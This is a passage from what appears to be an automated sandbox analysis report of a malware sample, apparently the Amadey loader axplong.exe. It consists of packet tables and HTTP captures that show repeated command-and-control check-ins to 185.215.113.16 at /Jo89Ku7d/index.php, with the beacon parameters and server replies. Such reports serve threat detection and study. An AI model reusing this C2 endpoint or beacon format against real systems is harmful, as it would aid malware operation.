                          Sep 26, 2024 17:06:55.040963888 CEST5569780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:55.041682959 CEST5569780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:55.046514034 CEST8055697185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:55.270845890 CEST8055697185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:55.271011114 CEST5569780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:55.378586054 CEST5569780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:55.379030943 CEST5569880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:55.383831024 CEST8055698185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:55.383955002 CEST5569880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:55.384082079 CEST8055697185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:55.384109020 CEST5569880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:55.384129047 CEST5569780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:55.388848066 CEST8055698185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:56.093096018 CEST8055698185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:56.093194008 CEST5569880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:56.094094992 CEST5569880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:56.098912954 CEST8055698185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:56.320708990 CEST8055698185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:56.320986032 CEST5569880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:56.426140070 CEST5569880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:56.426961899 CEST5569980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:56.431677103 CEST8055698185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:56.431804895 CEST5569880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:56.432010889 CEST8055699185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:56.432130098 CEST5569980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:56.432461977 CEST5569980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:56.437345028 CEST8055699185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:57.150849104 CEST8055699185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:57.150926113 CEST5569980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:57.153429985 CEST5569980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:57.158202887 CEST8055699185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:57.382288933 CEST8055699185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:57.382500887 CEST5569980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:57.487915039 CEST5569980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:57.488516092 CEST5570080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:57.493242025 CEST8055699185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:57.493283987 CEST5569980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:57.493352890 CEST8055700185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:57.493426085 CEST5570080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:57.493696928 CEST5570080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:57.498614073 CEST8055700185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:58.201766014 CEST8055700185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:58.201837063 CEST5570080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:58.202657938 CEST5570080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:58.208606005 CEST8055700185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:58.435995102 CEST8055700185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:58.436288118 CEST5570080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:58.550299883 CEST5570080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:58.550699949 CEST5570180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:58.555448055 CEST8055700185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:58.555509090 CEST5570080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:58.555521011 CEST8055701185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:58.555586100 CEST5570180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:58.555748940 CEST5570180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:58.560453892 CEST8055701185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:59.249171972 CEST8055701185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:59.249248028 CEST5570180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:59.250042915 CEST5570180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:59.254852057 CEST8055701185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:59.473507881 CEST8055701185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:59.473618984 CEST5570180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:59.581681013 CEST5570180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:59.582113028 CEST5570280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:59.586949110 CEST8055702185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:59.587120056 CEST8055701185.215.113.16192.168.2.4
                          Sep 26, 2024 17:06:59.587146997 CEST5570280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:59.587177038 CEST5570180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:59.587268114 CEST5570280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:06:59.592056036 CEST8055702185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:00.296009064 CEST8055702185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:00.296235085 CEST5570280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:00.296989918 CEST5570280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:00.301831961 CEST8055702185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:00.523525953 CEST8055702185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:00.523646116 CEST5570280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:00.628526926 CEST5570280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:00.629477024 CEST5570380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:00.633764029 CEST8055702185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:00.633841038 CEST5570280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:00.634882927 CEST8055703185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:00.634963036 CEST5570380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:00.635102034 CEST5570380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:00.639838934 CEST8055703185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:01.370619059 CEST8055703185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:01.370768070 CEST5570380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:01.374037027 CEST5570380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:01.378962040 CEST8055703185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:01.602348089 CEST8055703185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:01.602758884 CEST5570380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:01.706701994 CEST5570380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:01.707119942 CEST5570480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:01.712130070 CEST8055703185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:01.712240934 CEST8055704185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:01.712282896 CEST5570380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:01.712332964 CEST5570480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:01.712519884 CEST5570480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:01.717431068 CEST8055704185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:02.426134109 CEST8055704185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:02.426228046 CEST5570480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:02.426983118 CEST5570480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:02.431886911 CEST8055704185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:02.784313917 CEST8055704185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:02.784436941 CEST5570480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:02.895073891 CEST5570480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:02.895924091 CEST5570580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:02.900295973 CEST8055704185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:02.900429010 CEST5570480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:02.900783062 CEST8055705185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:02.900892019 CEST5570580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:02.901293039 CEST5570580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:02.906127930 CEST8055705185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:03.600759029 CEST8055705185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:03.600847006 CEST5570580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:03.605395079 CEST5570580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:03.605724096 CEST5570680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:03.610542059 CEST8055706185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:03.610599041 CEST5570680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:03.610845089 CEST8055705185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:03.610888004 CEST5570580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:03.611223936 CEST5570680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:03.616043091 CEST8055706185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:04.307177067 CEST8055706185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:04.307225943 CEST5570680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:04.414580107 CEST5570680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:04.415045023 CEST5570780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:04.420156956 CEST8055707185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:04.420242071 CEST5570780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:04.420330048 CEST8055706185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:04.420373917 CEST5570680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:04.420551062 CEST5570780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:04.425352097 CEST8055707185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:05.139678955 CEST8055707185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:05.142332077 CEST5570780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:05.153896093 CEST5570780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:05.158799887 CEST8055707185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:05.382577896 CEST8055707185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:05.382981062 CEST5570780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:05.490293980 CEST5570780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:05.490768909 CEST5570880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:05.495764017 CEST8055707185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:05.495805025 CEST8055708185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:05.495867968 CEST5570780192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:05.495903969 CEST5570880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:05.496049881 CEST5570880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:05.500817060 CEST8055708185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:06.197098017 CEST8055708185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:06.197173119 CEST5570880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:06.200462103 CEST5570880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:06.200905085 CEST5570980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:06.205852985 CEST8055708185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:06.205913067 CEST5570880192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:06.206001043 CEST8055709185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:06.206070900 CEST5570980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:06.206257105 CEST5570980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:06.211096048 CEST8055709185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:07.033999920 CEST8055709185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:07.034061909 CEST5570980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:07.151501894 CEST5570980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:07.151869059 CEST5571080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:07.156893969 CEST8055709185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:07.156964064 CEST5570980192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:07.157243013 CEST8055710185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:07.157435894 CEST5571080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:07.157963037 CEST5571080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:07.162853003 CEST8055710185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:07.851278067 CEST8055710185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:07.855353117 CEST5571080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:07.857961893 CEST5571080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:07.858360052 CEST5571180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:08.083271980 CEST8055710185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:08.083358049 CEST5571080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:08.084968090 CEST8055711185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:08.085042953 CEST8055710185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:08.085057974 CEST5571180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:08.085093975 CEST5571080192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:08.085304022 CEST5571180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:08.090518951 CEST8055711185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:08.792346001 CEST8055711185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:08.792433977 CEST5571180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:08.896596909 CEST5571180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:08.896945953 CEST5571280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:08.902092934 CEST8055711185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:08.902142048 CEST8055712185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:08.902196884 CEST5571180192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:08.902230978 CEST5571280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:08.902327061 CEST5571280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:08.907407045 CEST8055712185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:09.606389046 CEST8055712185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:09.606461048 CEST5571280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:09.611402035 CEST5571280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:09.616334915 CEST8055712185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:09.839040995 CEST8055712185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:09.839291096 CEST5571280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:10.634325981 CEST5571280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:10.635786057 CEST5571380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:10.639594078 CEST8055712185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:10.639642954 CEST5571280192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:10.640605927 CEST8055713185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:10.640675068 CEST5571380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:10.652206898 CEST5571380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:10.657093048 CEST8055713185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:11.361682892 CEST8055713185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:11.361756086 CEST5571380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:11.365475893 CEST5571380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:11.366132975 CEST5571480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:11.370560884 CEST8055713185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:11.370742083 CEST5571380192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:11.370950937 CEST8055714185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:11.371017933 CEST5571480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:11.371324062 CEST5571480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:11.376353979 CEST8055714185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:12.076751947 CEST8055714185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:12.076859951 CEST5571480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:12.193578959 CEST5571480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:12.193944931 CEST5571580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:12.199193001 CEST8055715185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:12.199213982 CEST8055714185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:12.199282885 CEST5571480192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:12.199352026 CEST5571580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:12.199443102 CEST5571580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:12.204384089 CEST8055715185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:12.920315981 CEST8055715185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:12.920454025 CEST5571580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:12.923763990 CEST5571580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:12.924076080 CEST5571680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:12.929044962 CEST8055715185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:12.929115057 CEST5571580192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:12.929239988 CEST8055716185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:12.929306984 CEST5571680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:12.929547071 CEST5571680192.168.2.4185.215.113.16
                          Sep 26, 2024 17:07:12.934592009 CEST8055716185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:13.653835058 CEST8055716185.215.113.16192.168.2.4
                          Sep 26, 2024 17:07:13.653909922 CEST5571680192.168.2.4185.215.113.16

                          UDP Packets

                          TimestampSource PortDest PortSource IPDest IP
                          Sep 26, 2024 17:05:37.369941950 CEST5351137162.159.36.2192.168.2.4
                          Sep 26, 2024 17:05:37.860608101 CEST5766853192.168.2.41.1.1.1
                          Sep 26, 2024 17:05:37.869045973 CEST53576681.1.1.1192.168.2.4

                          DNS Queries

                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                          Sep 26, 2024 17:05:37.860608101 CEST192.168.2.41.1.1.10x1f9fStandard query (0)15.164.165.52.in-addr.arpaPTR (Pointer record)IN (0x0001)false

                          DNS Answers

                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                          Sep 26, 2024 17:05:37.869045973 CEST1.1.1.1192.168.2.40x1f9fName error (3)15.164.165.52.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false

                          HTTP Request Dependency Graph

                          • 185.215.113.16

                          HTTP Packets

                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          0192.168.2.455650185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:03.361546040 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:04.071353912 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:03 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:04.073450089 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:04.300441980 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:04 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          1192.168.2.455651185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:04.416510105 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:05.147222996 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:05 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:05.148212910 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:05.383308887 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:05 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          2192.168.2.455652185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:05.493577003 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:06.197068930 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:06 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:06.197768927 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
                          Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 41 46 45 41 37 34 35 43 45 46 45 46 44 33 33 43 32 30 36 42 43 42 38 30 43 30 42 34 43 37 39 36 36 44 30 41 42 34 43 36 45 43 32 38 41 42 33 31 35 36 44 38 30 34 32 35 42 30 39
                          Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CAFEA745CEFEFD33C206BCB80C0B4C7966D0AB4C6EC28AB3156D80425B09
                          Sep 26, 2024 17:06:06.440093994 CEST196INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:06 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 7 <c><d>0


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          3192.168.2.455653185.215.113.16802140C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
                          TimestampBytes transferredDirectionData
                          Sep 26, 2024 17:06:06.556031942 CEST156OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 4
                          Cache-Control: no-cache
                          Data Raw: 73 74 3d 73
                          Data Ascii: st=s
                          Sep 26, 2024 17:06:07.265211105 CEST219INHTTP/1.1 200 OK
                          Server: nginx/1.18.0 (Ubuntu)
                          Date: Thu, 26 Sep 2024 15:06:07 GMT
                          Content-Type: text/html; charset=UTF-8
                          Transfer-Encoding: chunked
                          Connection: keep-alive
                          Refresh: 0; url = Login.php
                          Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a
                          Data Ascii: 1 0
                          Sep 26, 2024 17:06:07.266149998 CEST308OUTPOST /Jo89Ku7d/index.php HTTP/1.1
                          Content-Type: application/x-www-form-urlencoded
                          Host: 185.215.113.16
                          Content-Length: 154
                          Cache-Control: no-cache
